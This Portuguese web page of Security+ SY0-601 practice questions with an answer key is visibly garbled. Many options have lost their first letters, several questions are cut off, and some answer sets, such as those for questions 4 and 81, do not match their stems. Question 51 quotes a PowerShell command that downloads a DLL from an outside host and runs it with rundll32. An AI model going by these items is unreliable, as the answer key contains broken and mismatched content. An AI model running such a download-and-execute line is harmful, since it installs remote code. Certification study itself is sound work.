NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Prepare-se estrategicamente para o exame CompTIA Security+ com os testes práticos SY0-601

Para a certificação CompTIA Security+ SY0-601, ter acesso a recursos de exame de alta qualidade é essencial para uma preparação eficaz. Perguntas e respostas de testes práticos que refletem com precisão o conteúdo e os objetivos do exame permitem identificar áreas que exigem mais estudo. Os guias de estudo abrangentes fornecem explicações detalhadas sobre tópicos como gestão de riscos, resposta a incidentes, criptografia e arquitetura de segurança. Cursos em vídeo de fontes confiáveis oferecem uma maneira envolvente de reforçar conceitos-chave. Os exames de simulação que simulam o ambiente de teste real ajudam a desenvolver competências de gestão do tempo e a familiarizar-se com o formato do exame. A prática regular com esses recursos de exame ajuda a reforçar sua compreensão dos fundamentos de segurança abordados no exame SY0-601. Ao incorporar uma gama diversificada de materiais de estudo, questões práticas e exames simulados em sua preparação, você aumenta suas chances de passar no exame de certificação CompTIA Security+ com sucesso.
Faça outros exames online

Pergunta #1
O Diretor de Segurança da Informação pretende evitar a exfiltração de informações sensíveis dos telemóveis dos funcionários quando utilizam estações de carregamento USB públicas. Qual das seguintes seria a MELHOR solução a implementar?
A. DLP
B. Bloqueador de dados USB
C. SB OTG
D. esativar portas USB
Ver resposta
Resposta correta: B
Pergunta #2
Uma empresa sofreu recentemente uma perda significativa de dados quando informações proprietárias foram divulgadas a um concorrente. A empresa tomou precauções especiais, utilizando etiquetas adequadas; no entanto, os registos dos filtros de correio eletrónico não têm qualquer registo do incidente. Uma investigação confirmou que a rede da empresa não foi violada, mas os documentos foram descarregados do tablet COPE de um funcionário e transmitidos ao concorrente através do armazenamento na nuvem. Qual das seguintes opções é a MELHOR solução para esta fuga de dados?
A. Formação dos utilizadores
B. ASB
C. DM
D. LP
Ver resposta
Resposta correta: B
Pergunta #3
Duas organizações planeiam colaborar na avaliação de novas soluções SIEM para as respectivas empresas. Um esforço combinado das equipas SOC de ambas as organizações aceleraria o esforço. Qual das seguintes opções pode ser escrita para documentar este acordo?
A. OU
B. SA
C. LA
D. DA
Ver resposta
Resposta correta: A
Pergunta #4
O Diretor Executivo (CEO) de uma organização gostaria que os membros do pessoal tivessem a flexibilidade de trabalhar a partir de casa em qualquer altura durante o horário de expediente, incluindo durante uma pandemia ou crise. No entanto, o CEO receia que alguns membros do pessoal possam tirar partido da flexibilidade e trabalhar a partir de países de alto risco durante as férias ou subcontratar trabalho a uma organização terceira noutro país. O Diretor de Informação (CIO) acredita que a empresa pode implementar alguns controlos básicos para mitigar os principais riscos
A. RAT foi instalado e está a transferir ferramentas de exploração adicionais
B. As estações de trabalho estão a fazer beaconing para um servidor de comando e controlo
C. ma bomba lógica foi executada e é responsável pelas transferências de dados
D. Um vírus sem ficheiro está a propagar-se no ambiente de rede local
Ver resposta
Resposta correta: AB
Pergunta #5
Um engenheiro de rede e um engenheiro de segurança estão a discutir formas de monitorizar as operações de rede. Qual dos seguintes métodos é o MELHOR?
A. esativar o Telnet e forçar o SSH
B. Estabelecer um ping contínuo
C. Utilizar um monitor sem agente
D. Ativar o SNMPv3 com palavras-passe
Ver resposta
Resposta correta: C
Pergunta #6
Qual dos seguintes sistemas utiliza normalmente uma combinação de inteligência humana e artificial para analisar dados de eventos e tomar medidas sem intervenção?
A. TP
B. OSINT
C. OAR
D. SIEM
Ver resposta
Resposta correta: C
Pergunta #7
Uma empresa está a implementar a MFA para todas as aplicações que armazenam dados sensíveis. O gestor de TI pretende que a MFA não seja perturbadora e seja fácil de utilizar. Qual das seguintes tecnologias o gestor de TI deve utilizar ao implementar a MFA?
A. Palavras-passe únicas
B. Tokens de correio eletrónico
C. Notificações push
D. Autenticação de hardware
Ver resposta
Resposta correta: C
Pergunta #8
Qual dos seguintes termos descreve uma vasta gama de informações que são sensíveis a uma organização específica?
A. Público
B. Ultrassecreto
C. Proprietário
D. Código aberto
Ver resposta
Resposta correta: C
Pergunta #9
Uma organização está a planear abrir outros centros de dados para manter as operações no caso de uma catástrofe natural. Qual das seguintes considerações seria a MELHOR para apoiar a resiliência da organização?
A. Dispersão geográfica
B. Potência do gerador
C. Supressão de incêndios
D. Automatização de instalações
Ver resposta
Resposta correta: A
Pergunta #10
Qual dos seguintes controlos é utilizado para que uma organização tenha conhecimento inicial de um comprometimento de dados?
A. Proteção
B. Preventivo
C. Correctiva
D. Detetive
Ver resposta
Resposta correta: D
Pergunta #11
Um gestor de segurança da informação de uma organização está a realizar uma autoavaliação do PCI DSS pela primeira vez. Qual das seguintes é a razão MAIS provável para este tipo de avaliação?
A. Está atualmente em curso um projeto de expansão internacional
B. Os consultores externos utilizam esta ferramenta para medir a maturidade da segurança
C. A organização está à espera de processar informações sobre cartões de crédito
D. Uma entidade reguladora governamental solicitou a conclusão desta auditoria
Ver resposta
Resposta correta: C
Pergunta #12
Um scanner de ressonância magnética (MRI) ligado à rede num hospital é controlado e operado por um sistema operativo Windows especializado, desatualizado e sem suporte. Qual das seguintes opções é a que MAIS provavelmente impede o gestor de TI do hospital de atualizar o SO especializado?
A. O tempo necessário para o fornecedor de RMN atualizar o sistema teria um impacto negativo nos doentes
B. O fornecedor de MRI não suporta versões mais recentes do sistema operativo
C. alteração do SO viola um SLA de suporte com o fornecedor de MRI
D. A equipa de TI não dispõe do orçamento necessário para atualizar o scanner de ressonância magnética
Ver resposta
Resposta correta: B
Pergunta #13
Um atacante determinou que a melhor forma de afetar as operações é infiltrar-se em fornecedores de software de terceiros. Qual dos seguintes vectores está a ser explorado?
A. Redes sociais
B. Nuvem
C. Cadeia de abastecimento
D. Engenharia social
Ver resposta
Resposta correta: C
Pergunta #14
O SOC de um grande MSSP está reunido para discutir as lições aprendidas com um incidente recente que levou muito tempo para ser resolvido. Este tipo de incidente tornou-se mais comum nas últimas semanas e está a consumir grande parte do tempo dos analistas devido à execução de tarefas manuais. Qual das seguintes soluções o SOC deve considerar para melhorar MELHOR o seu tempo de resposta?
A. onfigurar um dispositivo NIDS usando um Analisador de Portas Comutadas
B. Recolher OSINT e catalogar os artefactos num repositório central
C. Implementar um SOAR com manuais personalizáveis
D. Instalar um SIEM com inteligência contra ameaças orientada para a comunidade
Ver resposta
Resposta correta: C
Pergunta #15
Um analista de segurança está a utilizar OSINT para recolher informações para verificar se os dados da empresa estão disponíveis publicamente. Qual das seguintes é a melhor aplicação para o analista utilizar?
A. Arvester
B. Cuco
C. map
D. Nessus
Ver resposta
Resposta correta: A
Pergunta #16
Qual das seguintes opções fornece um valor calculado para vulnerabilidades conhecidas para que as organizações possam priorizar as etapas de atenuação?
A. CVSS
B. SIEM
C. OAR
D. VE
Ver resposta
Resposta correta: A
Pergunta #17
Os parceiros comerciais estão a trabalhar num mecanismo de segurança para validar transacções de forma segura. O requisito é que uma empresa seja responsável pela implementação de uma solução fiável que registe e emita artefactos utilizados para assinar, encriptar e desencriptar ficheiros de transacções. Qual das seguintes é a MELHOR solução a adotar?
A. PKI
B. Cadeia de blocos
C. SAML
D. OAuth
Ver resposta
Resposta correta: A
Pergunta #18
Qual dos seguintes é um risco de segurança conhecido associado aos arquivos de dados que contêm informações financeiras?
A. Os dados podem tornar-se um passivo se forem arquivados durante mais tempo do que o exigido pelas orientações regulamentares
B. Os dados devem ser arquivados fora do local para evitar violações e cumprir os requisitos comerciais
C. As empresas estão proibidas de fornecer dados arquivados a pedidos de e-discovery
D. Os arquivos não encriptados devem ser preservados o mais tempo possível e encriptados
Ver resposta
Resposta correta: A
Pergunta #19
Uma organização bem conhecida tem estado a sofrer ataques de APTs. A organização está preocupada com o facto de o malware personalizado estar a ser criado e enviado por correio eletrónico para a empresa ou instalado em dispositivos USB que são deixados em parques de estacionamento. Qual das seguintes opções é a MELHOR defesa contra este cenário?
A. onfigurar o antivírus baseado em assinatura para atualizar a cada 30 minutos
B. Aplicar S/MIME para correio eletrónico e encriptar automaticamente unidades USB após a sua inserção
C. Implementar a execução de aplicações numa caixa de areia para software desconhecido
D. uzzing novos ficheiros para detetar vulnerabilidades se não estiverem assinados digitalmente
Ver resposta
Resposta correta: C
Pergunta #20
Como parte de uma avaliação de conformidade de segurança, um auditor efectua análises automatizadas de vulnerabilidades. Além disso, qual das seguintes acções deve o auditor realizar para concluir a avaliação?
A. Análise do comportamento do utilizador
B. Captura de pacotes
C. Revisões de configuração
D. Análise do registo
Ver resposta
Resposta correta: C
Pergunta #21
Um diretor de segurança de TI solicita um relatório sobre informações da empresa que estão disponíveis publicamente. A preocupação do gestor é que os agentes maliciosos possam aceder aos dados sem se envolverem em reconhecimento ativo. Qual das seguintes opções é a abordagem MAIS eficiente para efetuar a análise?
A. ornecer um parâmetro de domínio à ferramentaHarvester
B. erificar as entradas de DNS público utilizando o dnsenum
C. Efetuar um scan de vulnerabilidades Nessus visando o IP de uma empresa pública
D. Executar o nmap utilizando as opções: scan all ports e sneaky mode
Ver resposta
Resposta correta: A
Pergunta #22
Um analista de segurança repara numa quantidade invulgar de tráfego a atingir a extremidade da rede. Ao examinar os registos, o analista identifica um endereço IP de origem e bloqueia a comunicação desse endereço com a rede. Apesar de o analista estar a bloquear este endereço, o ataque ainda está em curso e provém de um grande número de endereços IP de origem diferentes. Qual das seguintes opções descreve esse tipo de ataque?
A. DDoS
B. Aumento de privilégios
C. nvenenamento de DNS
D. Estouro da memória intermédia
Ver resposta
Resposta correta: A
Pergunta #23
Qual das seguintes opções é um exemplo de transferência de risco?
A. Aquisição de seguros
B. Correção de servidores vulneráveis
C. liminar aplicações desactualizadas
D. Aprovação do risco do proprietário da aplicação
Ver resposta
Resposta correta: A
Pergunta #24
Qual dos seguintes controlos de segurança pode ser utilizado para impedir que várias pessoas utilizem uma passagem de cartão única e sejam admitidas numa entrada segura?
A. Registos de visitantes
B. Gaiolas de Faraday
C. Vestíbulos de controlo de acesso
D. Sensores de deteção de movimento
Ver resposta
Resposta correta: C
Pergunta #25
O departamento de marketing de uma empresa de retalho pretende publicar um Web site interno na Internet para que possa ser acedido por um número limitado de fornecedores de serviços externos específicos de forma segura. Qual das configurações a seguir seria a MELHOR para atender a esse requisito?
A. AC
B. CL
C. AF
D. AT
Ver resposta
Resposta correta: B
Pergunta #26
Uma empresa está a procurar migrar alguns servidores para a nuvem para minimizar a sua pegada tecnológica. A empresa tem um sistema de gestão de relações com clientes no local. Qual das seguintes soluções exigirá o MENOR suporte de infraestrutura e aplicação da empresa?
A. SaaS
B. aaS
C. aaS
D. DN
Ver resposta
Resposta correta: A
Pergunta #27
Um analista de segurança cibernética analisa os ficheiros de registo de um servidor Web e vê uma série de ficheiros que indicam que ocorreu um ataque de passagem de diretório. Qual das seguintes opções é mais provável que o analista veja?
A. ttp://sample
B. ttp://sample
C. ttp://sample
D. ttp://redirect
Ver resposta
Resposta correta: B
Pergunta #28
Um arquiteto de segurança está a conceber uma solução de acesso remoto para um parceiro de negócios. O parceiro de negócios precisa de aceder a um servidor Linux na empresa. O parceiro de negócios pretende evitar a gestão de uma palavra-passe para autenticação e instalação de software adicional. Qual das seguintes opções o arquiteto deve recomendar?
A. Ficha de registo suave
B. Cartão inteligente
C. SR
D. Chave SSH
Ver resposta
Resposta correta: D
Pergunta #29
Um analista de segurança pretende fazer referência a uma norma para desenvolver um programa de gestão de riscos. Qual das seguintes é a MELHOR fonte para o analista utilizar?
A. SAE SOC 2
B. ISO 31000
C. IST CSF
D. GPD
Ver resposta
Resposta correta: B
Pergunta #30
Qual das seguintes é a MAIOR preocupação de segurança quando se subcontrata o desenvolvimento de código a terceiros para uma aplicação virada para a Internet?
A. Roubo de propriedade intelectual
B. Privilégios elevados
C. Porta traseira desconhecida
D. Garantia de qualidade
Ver resposta
Resposta correta: C
Pergunta #31
Qual dos seguintes conceitos descreve MELHOR o acompanhamento e a documentação das alterações ao software e a gestão do acesso a ficheiros e sistemas?
A. Controlo de versões
B. Controlo contínuo
C. Procedimentos armazenados
D. Automatização
Ver resposta
Resposta correta: A
Pergunta #32
Qual das seguintes ferramentas é eficaz para impedir que um utilizador aceda a suportes amovíveis não autorizados?
A. Bloqueador de dados USB
B. Gaiola de Faraday
C. Leitor de proximidade
D. Bloqueio por cabo
Ver resposta
Resposta correta: A
Pergunta #33
Um analista de segurança está a rever o relatório de análise de vulnerabilidades de um servidor Web na sequência de um incidente. A vulnerabilidade que foi utilizada para explorar o servidor está presente nos relatórios históricos de análise de vulnerabilidades e existe um patch disponível para a vulnerabilidade. Qual das seguintes opções é a causa MAIS provável?
A. Os patches de segurança foram desinstalados devido ao impacto no utilizador
B. Um adversário alterou os relatórios de análise de vulnerabilidades
C. Foi utilizada uma vulnerabilidade de dia zero para explorar o servidor Web
D. O scan reportou um falso negativo para a vulnerabilidade
Ver resposta
Resposta correta: A
Pergunta #34
Um analista de segurança está a investigar o tráfego suspeito no servidor Web localizado no endereço IP 10.10.1.1. Uma pesquisa nos registos do WAF revela o seguinte resultado: Qual das seguintes situações é a MAIS provável?
A. Ataque XSS
B. Ataque SQLi
C. Ataque de repetição
D. Ataque XSRF
Ver resposta
Resposta correta: B
Pergunta #35
Qual das seguintes é uma política que proporciona uma maior profundidade e amplitude de conhecimentos numa organização?
A. Política de gestão de activos
B. Política de separação de funções
C. Política de utilização aceitável
D. Política de rotação de funções
Ver resposta
Resposta correta: D
Pergunta #36
Qual das seguintes opções seria a MELHOR para fornecer controlos de deteção e correção para a regulação térmica?
A. Um detetor de fumo
B. Um alarme de incêndio
C. Um sistema HVAC
D. Um sistema de supressão de incêndios
E. Guardas
Ver resposta
Resposta correta: C
Pergunta #37
Um analista de segurança repara que estão a ser eliminados ficheiros específicos sempre que um administrador de sistemas está de férias. Qual das seguintes opções descreve MELHOR o tipo de malware que está a ser executado?
A. Vírus sem ficheiro
B. Bomba lógica
C. eylogger
D. Ransomware
Ver resposta
Resposta correta: B
Pergunta #38
Qual das seguintes é uma ferramenta eficaz para parar ou impedir a exfiltração de dados de uma rede?
A. DLP
B. IDS
C. PM
D. DE
Ver resposta
Resposta correta: A
Pergunta #39
Um visitante de um sítio Web é obrigado a fornecer informações corretamente formatadas num campo específico de um formulário de um sítio Web. Qual das seguintes medidas de segurança é mais provavelmente utilizada para este requisito?
A. Validação dos dados de entrada
B. Assinatura do código
C. njeção de SQL
D. Apresentação de formulários
Ver resposta
Resposta correta: A
Pergunta #40
Um administrador de segurança suspeita que podem existir serviços desnecessários em execução num servidor. Qual das seguintes ferramentas é mais provável que o administrador utilize para confirmar as suspeitas?
A. Nmap
B. Wireshark
C. Autópsia
D. NSEnum
Ver resposta
Resposta correta: A
Pergunta #41
Uma empresa implementou um ponto de acesso WiFi numa área pública e pretende reforçar a configuração para o tornar mais seguro. Depois de efetuar uma avaliação, um analista identifica que o ponto de acesso está configurado para utilizar WPA3, AES, WPS e RADIUS. Qual das seguintes opções o analista deve desativar para aumentar a segurança do ponto de acesso?
A. PA3
B. ES
C. ADIUS
D. PS
Ver resposta
Resposta correta: D
Pergunta #42
Uma empresa de fabrico tem vários sistemas de informação antigos únicos que não podem ser migrados para um sistema operativo mais recente devido a problemas de compatibilidade de software. Os sistemas operativos ainda são suportados pelo fornecedor, mas o software industrial já não é suportado. O Diretor de Segurança da Informação criou um plano de resiliência para estes sistemas que permitirá a instalação de patches do SO num ambiente de não produção, criando também cópias de segurança dos sistemas para recuperação. Qual das seguintes técnicas de resiliência irá
A. Redundância
B. AID 1+5
C. Máquinas virtuais
D. Cópias de segurança completas
Ver resposta
Resposta correta: C
Pergunta #43
Um novo engenheiro de segurança começou a reforçar os sistemas. Uma das técnicas de reforço que o engenheiro está a utilizar envolve a desativação de inícios de sessão remotos no NAS. Os utilizadores estão agora a reportar a incapacidade de utilizar o SCP para transferir ficheiros para o NAS, apesar de os dados ainda poderem ser visualizados a partir dos PCs dos utilizadores. Qual das seguintes é a causa mais provável deste problema?
A. O TFTP foi desativado nos anfitriões locais
B. SSH foi desligado em vez de modificar o ficheiro de configuração
C. login remoto foi desativado no networkd
D. Os serviços de rede já não estão a ser executados no NAS
Ver resposta
Resposta correta: B
Pergunta #44
Uma organização lançou recentemente uma política de garantia de software que exige que os programadores executem análises de código todas as noites no repositório. Após a primeira noite, a equipe de segurança alertou os desenvolvedores que mais de 2.000 descobertas foram relatadas e precisam ser resolvidas. Qual das seguintes é a causa MAIS provável para o elevado número de constatações?
A. O scanner de vulnerabilidades não estava corretamente configurado e gerou um elevado número de falsos positivos
B. ibliotecas de terceiros foram carregadas no repositório e devem ser removidas da base de código
C. scanner de vulnerabilidades encontrou várias fugas de memória durante o tempo de execução, causando relatórios duplicados para o mesmo problema
D. O scanner de vulnerabilidades não foi carregado com os parâmetros de referência correctos e precisa de ser atualizado
Ver resposta
Resposta correta: A
Pergunta #45
Um administrador de segurança examina a tabela ARP de um comutador de acesso e vê o seguinte resultado:
A. DoS na porta Fa0/2
B. nundação de MAC na porta Fa0/2
C. RP poisoning na porta Fa0/1
D. nvenenamento de DNS na porta Fa0/1
Ver resposta
Resposta correta: B
Pergunta #46
Um analista de segurança está a avaliar os riscos de autorizar várias soluções de segurança a recolher dados do ambiente de nuvem da empresa. Qual das seguintes opções é uma consequência imediata dessas integrações?
A. Incumprimento das regras de soberania dos dados
B. Perda do apoio à interoperabilidade dos fornecedores
C. Implantação obrigatória de uma solução SIEM
D. Aumento da superfície de ataque
Ver resposta
Resposta correta: D
Pergunta #47
Qual dos seguintes controlos constituiria a MELHOR proteção contra o "tailgating"?
A. Vestíbulo de controlo de acesso
B. Circuito fechado de televisão
C. Leitor de cartões de proximidade
D. Gaiola de Faraday
Ver resposta
Resposta correta: A
Pergunta #48
Um analista de segurança está à procura de uma solução para ajudar a comunicar à equipa de liderança os níveis de gravidade das vulnerabilidades da organização. Qual das seguintes opções seria a MELHOR para atender a essa necessidade?
A. VE
B. SIEM
C. OAR
D. CVSS
Ver resposta
Resposta correta: D
Pergunta #49
Qual dos seguintes componentes pode ser utilizado para consolidar e encaminhar o tráfego de entrada da Internet para vários ambientes de nuvem através de uma única firewall?
A. Passagem de trânsito
B. Sítio quente na nuvem
C. Computação periférica
D. NS sinkhole
Ver resposta
Resposta correta: A
Pergunta #50
Uma organização mantém vários ambientes nos quais os patches são desenvolvidos e testados antes de serem implementados num estado operacional. Qual dos seguintes é o ambiente em que os patches serão implementados imediatamente antes de serem colocados num estado operacional?
A. Desenvolvimento
B. Teste
C. rodução
D. Encenação
Ver resposta
Resposta correta: D
Pergunta #51
Um funcionário recebeu um e-mail com um anexo de ficheiro invulgar chamado Updates.lnk. Um analista de segurança está a fazer engenharia inversa do que o ficheiro faz e descobre que executa o seguinte script:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dllQual das seguintes opções descreve MELHOR o que o analista encontrou?
A. Um código do PowerShell está a executar uma injeção de DLL
B. Um código do PowerShell está a apresentar uma imagem
C. Um código do PowerShell está a configurar variáveis ambientais
D. m código do PowerShell está a alterar as definições do Windows Update
Ver resposta
Resposta correta: A
Pergunta #52
Um analista de segurança está a rever os registos do computador porque um anfitrião foi comprometido por malware. Depois de infetado, o computador apresentou um ecrã de erro e foi encerrado. Qual das seguintes opções o analista deve analisar primeiro para obter mais informações?
A. Ficheiro de despejo
B. Registo do sistema
C. Registo de aplicações Web
D. Registo de segurança
Ver resposta
Resposta correta: A
Pergunta #53
Qual das seguintes opções mede o tempo médio que o equipamento funcionará antes de se avariar?
A. LE
B. TBF
C. TO
D. RO
Ver resposta
Resposta correta: B
Pergunta #54
Qual dos seguintes é um risco que está especificamente associado ao alojamento de aplicações na nuvem pública?
A. Contas de raiz não garantidas
B. ia zero
C. Arrendamento partilhado
D. Ameaça interna
Ver resposta
Resposta correta: C
Pergunta #55
Um atacante substitui um documento assinado digitalmente por outra versão que passa despercebida. Ao rever o conteúdo do documento, o autor repara em algum palavreado adicional que não estava originalmente no documento, mas não consegue validar um problema de integridade. Qual dos seguintes ataques foi utilizado?
A. Criptomalware
B. Substituição de hash
C. Colisão
D. Phishing
Ver resposta
Resposta correta: B
Pergunta #56
Um engenheiro de segurança tem de implementar dois routers sem fios numa suite de escritório. Os outros inquilinos do edifício de escritórios não devem poder ligar-se a esta rede sem fios. Qual dos seguintes protocolos deve o engenheiro implementar para garantir a encriptação MAIS FORTE?
A. PS
B. PA2
C. AP
D. TTPS
Ver resposta
Resposta correta: B
Pergunta #57
Um incidente de segurança foi resolvido. Qual das seguintes opções descreve MELHOR a importância da fase final do plano de resposta a incidentes?
A. xamina e documenta a forma como a equipa respondeu, descobre o que causou o incidente e determina como o incidente pode ser evitado no futuro
B. Devolve os sistemas afectados à produção depois de os sistemas terem sido totalmente corrigidos, os dados restaurados e as vulnerabilidades resolvidas
C. dentifica o incidente e o âmbito da violação, a forma como afecta o ambiente de produção e o ponto de entrada
D. Contém os sistemas afectados e desliga-os da rede, impedindo a propagação do ataque ou da violação
Ver resposta
Resposta correta: A
Pergunta #58
Qual das seguintes é uma razão para publicar os hashes dos ficheiros?
A. Para validar a integridade dos ficheiros
B. Para verificar se o software foi assinado digitalmente
C. Para utilizar o hash como uma chave de ativação de software
D. Para utilizar o hash como uma frase-chave de desencriptação
Ver resposta
Resposta correta: A
Pergunta #59
Uma empresa que fornece um serviço de streaming em linha disponibilizou publicamente os dados pessoais dos seus clientes, incluindo nomes e endereços de correio eletrónico, num serviço de armazenamento em nuvem. Como resultado, a empresa registou um aumento no número de pedidos de eliminação de contas de utilizadores. Qual das seguintes opções descreve MELHOR a consequência desta divulgação de dados?
A. Coimas regulamentares
B. Danos à reputação
C. Aumento dos custos de seguro
D. Perda financeira
Ver resposta
Resposta correta: B
Pergunta #60
Qual dos seguintes tipos de controlo seria o MELHOR a utilizar num departamento de contabilidade para reduzir as perdas resultantes de transacções fraudulentas?
A. Recuperação
B. Dissuasão
C. Correctiva
D. Detetive
Ver resposta
Resposta correta: D
Pergunta #61
Um analista de segurança recebe um alerta do SIEM da empresa de que uma atividade anómala está a vir de um endereço IP de origem local 192.168.34.26. O Diretor de Segurança da Informação pede ao analista que bloqueie a fonte de origem. Vários dias depois, outro funcionário abre um ticket interno informando que as varreduras de vulnerabilidade não estão mais sendo realizadas corretamente. O endereço IP fornecido pelo funcionário é 192.168.34.26. Qual das seguintes opções descreve esse tipo de alerta?
A. Verdadeiro negativo
B. Verdadeiro positivo
C. Falso positivo
D. Falso negativo
Ver resposta
Resposta correta: C
Pergunta #62
Uma empresa precisa de validar o seu plano atualizado de resposta a incidentes utilizando um cenário real que testará os pontos de decisão e as acções relevantes de resposta a incidentes sem interromper as operações diárias. Qual das alternativas a seguir MELHOR atenderia aos requisitos da empresa?
A. Exercício de equipa vermelha
B. Exercício de captura da bandeira
C. Exercício de mesa
D. Exercício de phishing
Ver resposta
Resposta correta: C
Pergunta #63
O Diretor de Segurança (CSO) de uma organização pretende validar o envolvimento da empresa no plano de resposta a incidentes para garantir a sua validade e rigor. Qual das seguintes opções é mais provável que o CSO utilize?
A. Uma avaliação externa da segurança
B. Um programa de recompensa por erros
C. Um exercício de mesa
D. Um compromisso da equipa vermelha
Ver resposta
Resposta correta: C
Pergunta #64
Uma grande empresa transformadora actualizou a sua infraestrutura interna e começou recentemente a permitir que as aplicações OAuth acedam aos dados da empresa. Estão agora a ser comunicadas fugas de dados. Qual das seguintes opções é a causa mais provável do problema?
A. Rutura de privilégios
B. Definições por defeito não modificadas
C. ulnerabilidades do protocolo TLS
D. Gestão inadequada de patches
Ver resposta
Resposta correta: B
Pergunta #65
Um executivo do sector retalhista aceitou recentemente um emprego num grande concorrente. Na semana seguinte, um analista de segurança analisa os registos de segurança e identifica tentativas de início de sessão bem sucedidas para aceder às contas do executivo que partiu. Qual das seguintes práticas de segurança teria resolvido o problema?
A. Um acordo de não divulgação
B. Menor privilégio
C. Uma política de utilização aceitável
D. ffboarding
Ver resposta
Resposta correta: D
Pergunta #66
Um analista de segurança está a investigar um relatório de um teste de penetração. Durante o teste de penetração, os consultores conseguiram descarregar dados sensíveis de um servidor back-end. O servidor back-end estava a expor uma API que só deveria estar disponível a partir da aplicação móvel da empresa. Depois de analisar os registos do servidor back-end, o analista de segurança encontra as seguintes entradas: Qual das seguintes é a causa mais provável do desvio do controlo de segurança?
A. Lista de permissões de endereços IP
B. Falsificação de agentes de utilizador
C. Desvio do WAF
D. Manipulação de referenciadores
Ver resposta
Resposta correta: B
Pergunta #67
Qual das seguintes é a MELHOR ação para promover um processo de resposta a incidentes consistente e auditável?
A. Incentivar as novas contratações a atualizar constantemente o documento com conhecimentos externos
B. Publicar o documento num repositório central que seja facilmente acessível à organização
C. estringir a elegibilidade para comentar o processo aos peritos na matéria de cada silo informático
D. Fazer uma rotação dos membros da CIRT para promover um modelo de responsabilidade partilhada na organização
Ver resposta
Resposta correta: D
Pergunta #68
Uma empresa está a mudar o seu site de retalho para um fornecedor de serviços de nuvem pública. A empresa deseja tokenizar os dados do cartão de crédito, mas não permitir que o provedor de nuvem veja as informações armazenadas do cartão de crédito. Qual das opções a seguir MELHOR atenderia a esses objetivos?
A. AF
B. ASB
C. PN
D. LS
Ver resposta
Resposta correta: B
Pergunta #69
Uma empresa pretende simplificar o processo de gestão de certificados. A empresa tem um único domínio com várias dezenas de subdomínios, todos eles acessíveis ao público na Internet. Qual das seguintes opções descreve MELHOR o tipo de certificado que a empresa deve implementar?
A. Nome alternativo do assunto
B. Curinga
C. Auto-assinado
D. Validação do domínio
Ver resposta
Resposta correta: B
Pergunta #70
Um analista de segurança gerou um ficheiro com o nome host1.pcap e partilhou-o com um membro da equipa que o vai utilizar para uma análise mais aprofundada do incidente. Qual das seguintes ferramentas é mais provável que o outro membro da equipa utilize para abrir este ficheiro?
A. Autópsia
B. emdump
C. erador de imagens C
D. Wireshark
Ver resposta
Resposta correta: D
Pergunta #71
O gestor responsável por um conjunto de dados pediu a um engenheiro de segurança que aplicasse a encriptação aos dados de um disco rígido. O engenheiro de segurança é um exemplo de um __________.
A. Controlador de dados
B. roprietário dos dados
C. uardião de dados
D. rocessador de dados
Ver resposta
Resposta correta: C
Pergunta #72
Um administrador de segurança precisa bloquear uma conexão TCP usando o firewall corporativo. Como essa conexão é potencialmente uma ameaça, o administrador não quer enviar de volta um RST. Qual das seguintes ações na regra de firewall funcionaria MELHOR?
A. Gota
B. Rejeitar
C. Alerta de registo
D. Autorização
Ver resposta
Resposta correta: A
Pergunta #73
Um administrador de segurança precisa de inspecionar ficheiros em trânsito na rede da empresa para procurar informações pessoais, dados de cartões de crédito e palavras de classificação. Qual das seguintes opções seria a MELHOR a utilizar?
A. Solução IDS
B. Solução EDR
C. Solução de software HIPS
D. Solução DLP de rede
Ver resposta
Resposta correta: D
Pergunta #74
HOTSPOT (Drag and Drop não é suportado)Ocorreu um incidente no ambiente de produção.INSTRUÇÃOAnalise as saídas de comando e identifique o tipo de comprometimento.Se a qualquer momento você quiser trazer de volta o estado inicial da simulação, por favor clique no botão Reset All.Hot Area:
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #75
Qual dos seguintes é um ataque direcionado que visa comprometer os utilizadores de um sector ou grupo específico?
A. Buraco de rega
B. Typosquatting
C. Farsa
D. Falsificação de identidade
Ver resposta
Resposta correta: A
Pergunta #76
Uma empresa tem uma rede plana na nuvem. A empresa precisa de implementar uma solução para segmentar os seus servidores de produção e de não produção sem migrar os servidores para uma nova rede. Qual das seguintes soluções a empresa deve implementar?
A. Intranet
B. Sub-rede rastreada
C. egmentação de VLAN
D. Confiança zero
Ver resposta
Resposta correta: C
Pergunta #77
Um administrador de segurança, que trabalha para uma organização governamental, gostaria de utilizar a classificação e o planeamento granular para proteger dados ultra-secretos e conceder acesso com base na necessidade de conhecimento. Qual dos seguintes esquemas de controlo de acesso deve o administrador considerar?
A. Obrigatório
B. Baseado em regras
C. Discricionário
D. Baseado em funções
Ver resposta
Resposta correta: A
Pergunta #78
Durante uma avaliação de segurança, um analista de segurança encontra um ficheiro com permissões excessivamente permissivas. Qual das seguintes ferramentas permitirá ao analista reduzir as permissões para os utilizadores e grupos existentes e remover o bit set-user-ID do ficheiro?
A. s
B. hflags
C. hmod
D. sof
E. etuid
Ver resposta
Resposta correta: C
Pergunta #79
Qual das seguintes opções é necessária para que um IDS e um WAF sejam eficazes no tráfego HTTPS?
A. Hashing
B. NS sinkhole
C. nspeção TLS
D. Mascaramento de dados
Ver resposta
Resposta correta: C
Pergunta #80
Um engenheiro de rede está a resolver problemas de conetividade de rede sem fios que foram comunicados pelos utilizadores. Os problemas estão a ocorrer apenas na secção do edifício mais próxima do parque de estacionamento. Os utilizadores estão a ter velocidades lentas intermitentes quando acedem a sites e não conseguem ligar-se a unidades de rede. Os problemas parecem aumentar quando os utilizadores de computadores portáteis regressam às suas secretárias depois de utilizarem os seus dispositivos noutras áreas do edifício. Houve também relatos de utilizadores que foram obrigados a entrar no
A. Um ponto de acesso externo está a participar num ataque evil-twin
B. O sinal no WAP tem de ser aumentado nessa secção do edifício
C. Os certificados expiraram nos dispositivos e precisam de ser reinstalados
D. Os utilizadores dessa secção do edifício estão numa VLAN que está a ser bloqueada pela firewall
Ver resposta
Resposta correta: A
Pergunta #81
Uma organização está preocupada com a possibilidade de hackers entrarem em uma instalação e conectarem uma caixa Kali Linux acessível remotamente. Quais das seguintes opções devem ser as primeiras linhas de defesa contra esse ataque? (Escolha duas.)
A. Análise das redes sociais
B. Formação anual em matéria de segurança da informação
C. Gamificação
D. Campanha de phishing
Ver resposta
Resposta correta: BC
Pergunta #82
